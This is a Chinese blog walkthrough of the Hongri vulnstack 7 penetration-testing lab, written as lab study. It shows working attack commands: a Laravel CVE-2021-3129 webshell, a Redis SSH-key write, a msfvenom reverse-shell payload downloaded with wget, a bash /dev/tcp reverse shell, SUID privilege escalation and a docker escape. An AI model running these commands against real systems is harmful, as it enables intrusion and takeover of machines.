内网攻防-红日靶机7

最新推荐文章于 2023-12-17 17:53:30 发布
最新推荐文章于 2023-12-17 17:53:30 发布
阅读量3.3k 收藏 3
点赞数
文章标签: web安全 安全 linux 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45720618/article/details/120233721
版权

网络拓扑
在这里插入图片描述

  • 扫描目标端口
    在这里插入图片描述

  • 开放80、81两个站点
    在这里插入图片描述

根据81站点右下角 Laravel v8.29.0 寻找爆出的漏洞
在这里插入图片描述
利用网上公开的EXP成功写入后门并连接。利用后门尝试反弹shell,MSF接不到shell????查看主机配置,哦~,监听本地81端口,然后转发到192.168.52.20的8000端口。(要不是靶场,还真不清楚咋回事)
在这里插入图片描述
原来访问的是这个,怪不得不能将shell反弹到Kali
在这里插入图片描述

  • 回头看看开放的6379,呦~
    在这里插入图片描述

  • 写密钥

    ssh-keygen -t rsa						#生成密钥
(echo -e "\n\n"; cat /root/.ssh/id_rsa.pub; echo -e "\n\n") > 1.txt		#将公钥信息写入1.txt#
cat 1.txt | redis-cli -h 192.168.0.103 -x set hello						#把1.txt文件内容写入目标主机redis的缓冲中
redis-cli -h 192.168.0.103
config set dir /root/.ssh          		#设置redis的备份路径为/root/.ssh/
config set dbfilename authorized_keys	#设置保存文件名为authorized_keys
save

  • ssh root@192.168.0.103连接成功,查看当前IP

    在这里插入图片描述

  • MSF生成后门文件

    msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.0.104 lport=6666 -f elf -o msf.elf

    在这里插入图片描述

  • Python起一个HTTP服务
    在这里插入图片描述

  • 下载生成的后门wget http://192.168.0.104:9090/msf.elf MSF启动监听

    在这里插入图片描述

  • 下一步获取目标主机的网络信息

    在这里插入图片描述

  • 扫描目标网段存活了那些IP,一个没扫到。。。。。。。。多半是防火墙拦了

    在这里插入图片描述

  • 回头查看利用Laravel(CVE-2021-3129)web漏洞 写入的后门,发现当前权限过低需要提权,查看有无 通过环境变量提权的可能性

    find / -user root -perm -4000 -print 2>/dev/null

    在这里插入图片描述

  • 查看执行shell文件是什么情况,发现与ps命令相似

    在这里插入图片描述

  • 使用环境变量配合SUID进行提权,环境变量添加失败,网上说需要反弹shell,使用后门连接的情况下确实有问题

    在这里插入图片描述

  • 因为无法将shell直接反弹到kali,所以将shell反弹到52.10上

    nc -lvp 1234	#利用redis未授权写入密钥,然后进行SSH链接,再执行
bash -c 'exec bash -i >& /dev/tcp/192.168.52.10/1234 0>&1'	#通过webshell执行

    在这里插入图片描述

  • 再进行SUID提权

    cp /bin/bash /tmp/ps
export PATH=/tmp:$PATH
./shell
id

    在这里插入图片描述

  • 然后使用root权限下载后门并执行,后门就享有root权限;

  • kali有Ubuntu2的路由,但是Ubuntu2没有kali的路由,所以生成正向连接的后门,kali主动去连接Ubuntu2;

  • 由于Ubuntu1做了代理,实则拿到的webshell为Ubuntu2的,将生成的正向后门通过webshell上传到Ubuntu2
    在这里插入图片描述
    在这里插入图片描述

  • MSF启动监听;webshell执行后门

  • 发现接收不到shell
    在这里插入图片描述

  • 通过webshell查看根目录,发现.dockerenv文件,判断当前处于docker环境
    在这里插入图片描述

  • docker逃逸 - -Ubuntu1生成公钥

    ssh-keygen -f hello		#生成名为hello的公钥文件
chmod 600 hello
ls
cat hello.pub			#将内容复制

    在这里插入图片描述

  • docker逃逸

    fdisk -l     		#查看磁盘文件
ls /dev      		#查看设备文件
cd /
mkdir haha			
mount /dev/sda1 /haha	#将/dev/sda1挂在到/haha目录里
ls /haha

    挂载成功
    在这里插入图片描述

  • docker逃逸 - - 密钥覆盖

    cp -avx /haha/home/ubuntu/.ssh/id_rsa.pub /haha/home/ubuntu/.ssh/authorized_keys	#-avx将权限也一起复制
echo > /haha/home/ubuntu/.ssh/authorized_keys
echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQClid+sVn9qavo22Vh1HcHV3i6MclKedlVO1O8jTsFIQbuSJYbcmw6JjB++Twwzz0j0HRFP39ztUtc8DE0Ji+0Fb4opWORynE1TLSI767LOhY9BqFfufGKZEN3qXRZhKLiY67WykEtkSUWvxXXRwHEZneC1cgslPXYx9hdbf5lqwWDJM6+PBFQJ4uyN/BZkLDs7307sBYO90+GAPYeBGBnSkjxLKyr6DNP6eXmfRBB83Y+3F4fJE4gD7kNspvUEl4GyWcg0JrmBusMZb4Iz+0CvtjD1ln7eLhT4hat/7zWn1hoW2FXnvT4bJ1y7GCLczq5lbAsf5AADeOB+o9JEwyc5 root@ubuntu' > /haha/home/ubuntu/.ssh/authorized_keys	#将ssh秘钥写入authorized_keys文件

    ssh -i haha ubuntu@192.168.52.20		#使用Ubuntu1的shell连接

    在这里插入图片描述

  • 连接成功之后,执行后门文件,如果执行MSF后门文件报错’Segmentation fault (core dumped)'👇,说明机器内存不够用了(淦,这个问题折磨了我3小时23分钟)。后门是重新生成的,端口改为了6789,
    在这里插入图片描述

  • 关闭一些后台以后,再执行后门文件就可以了
    在这里插入图片描述

  • 梅开二度
    在这里插入图片描述

  • Ubuntu1、Ubuntu2已经拿到了,就是没能把第二层网络里的win7扫出来
    先到这吧,第一次捣鼓内网,思路乱,技术菜,请大佬指教

哇·咔咔
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
Ceph文件系统安装步骤
11-16 4457
创建用户:#sudo useradd  -d /home/ceph  -s /bin/bash  [-m] ceph #passwd ceph             ///密码设为:ceph #vim/etc/sudoers  添加:ceph ALL=(ALL) ALL   Linux实现SSH无密码登录   源文档 http://stevenz.blog.hexun.com
红日安全att&ck靶场7 内网靶场 WP
trytowritecode的博客
04-11 7042
记一次中型靶场getshell全过程,难度适中,很有意思 这里用kali来模拟外网攻击机,其实用自己服务器也完全ok 个人认为,此方法比官方wp要好懂一些 首先是靶场地址 靶场 先看拓扑图因为环境要提前配置,这里的192.168.1.0/24的这个网段根据自己的虚拟机环境来改不一定说一定要和官方拓扑一模一样,就像我自己就是192.168.16.0/24 看下图 然后开始配置环境,网卡这里官方已经处理的差不多了,大概是能测试ping通就行 然后启动服务这里全按官方说明来配置 这里注意了很重要不然你后面打靶
红日靶场(七)vulnstack7
qq_63451318的博客
04-07 1806
自学网络安全,学习靶场渗透
红日靶场七教程,不看后悔!
weixin_45885440的博客
10-11 1464
主要包括常规信息收集、Web攻防、代码审计、漏洞利用、内网渗透以及域渗透等相关内容学习
红日七vulnstack7全操作
weixin_62334252的博客
06-22 7058
http://vulnstack.qiyuanxuetang.net/vuln/detail/9/整个靶场的网络环境分为三层。从最初的信息收集、外网初探、攻入内网、搭建代理,横向移动,最终拿下域控。 域用户账户和密码如下: Administrator:Whoami2021 whoami:Whoami2021 bunny:Bunny2021 moretz:Moretz2021Ubuntu 1: webweb2021Ubuntu 2: ubuntu
ATT&CK靶场系列(七)
qq_1873822的博客
12-04 6864
一、环境配置 vlunstack是红日安全团队出品的一个实战环境,具体介绍请访问:http://vulnstack.qiyuanxuetang.net/vuln/detail/9/ DMZ区IP段为192.168.1.1/24 第二层网络环境IP段为192.168.52.1/24 第三层网络环境IP段为192.168.93.1/24 按着上面的图片把相关的ip段给配置就行 DMZ区域: 给Ubuntu (Web 1) 配置了两个网卡,一个可以对外提供服务;一个连接第二层网络。 第二层网络区域: 给U
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
网络攻防靶机-设计概要 V5.docx
09-06
网络攻防靶机-设计概要 V5.docx 网络攻防靶机是指一种可以模拟网络攻击和防御的系统,旨在提高网络安全防御能力。该系统的设计概要包括项目概况、术语与定义、项目来源与参考资料、引用标准和规范、系统总体框架、...
sqli-labs-master靶机
10-12
sqli-labs-master。
ATT&CK实战:红日靶场七
学生
06-19 651
*] WebTitle: http://192.168.52.30:8080 code:200 len:10065 title:通达OA网络智能办公系统。[*] WebTitle: http://192.168.93.20:8080 code:200 len:10065 title:通达OA网络智能办公系统。[+] InfoScan:http://192.168.52.30:8080 [通达OA][+] InfoScan:http://192.168.93.20:8080 [通达OA]
Laravel 8 反序列化分析
dzqxwzoe的博客
08-12 305
这里简单的看下源码,感兴趣的师傅可以拿着laravel5的源码来进行对比,这里只不过是写成了三元运算的形式,本质上还是一样的,我们控制queueResolver变量和commandShouldBeQueued函数,使其返回为真,这样就可进入dispatchToQueue函数;这里分析一个laravel8的反序列化漏洞,但是让我感到意外的是,这个漏洞竟然在低版本的laravel上依然可以存在,从根本来说这个漏洞laravel的mockery组件漏洞,没想到一直没修;这里就可直接跳转到我们想要执行的方法下;
ambari 安装
蘑菇丁的专栏
10-14 3728
1.ambari 官网地址:http://ambari.apache.org 2.下载ambari [hadoop@slavenode7 hadoop]$  wget http://public-repo-1.hortonworks.com/ambari/centos6/2.x/updates/2.0.1/ambari.repo 100%[=========================
网络通信过程(11)
qq_27009517的博客
07-20 5367
文章目录11.1. 网络通信过程11.2. NAT(网络地址转换器) 11.1. 网络通信过程 1. 2台电脑的网络 说明 如果两台电脑之间通过网线连接是可以直接通信的,但是需要提前设置好ip地址以及网络掩码 并且ip地址需要控制在同一网段内,例如 一台为192.168.1.1另一台为192.168.1.2则可以进行通信 2. 使用集线器组成一个网络 说明 当有多态电脑需要组成一个网时,那么可以通过集线器(Hub)将其链接在一起 一般情况下集线器的接口较少 集线器有个缺点,它以广播的方式进行发
红日靶场7
m0_58595840的博客
01-11 1322
内网渗透
ATT&CK 红日靶场7打靶
最新发布
qq_59022350的博客
12-17 907
域内账号。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值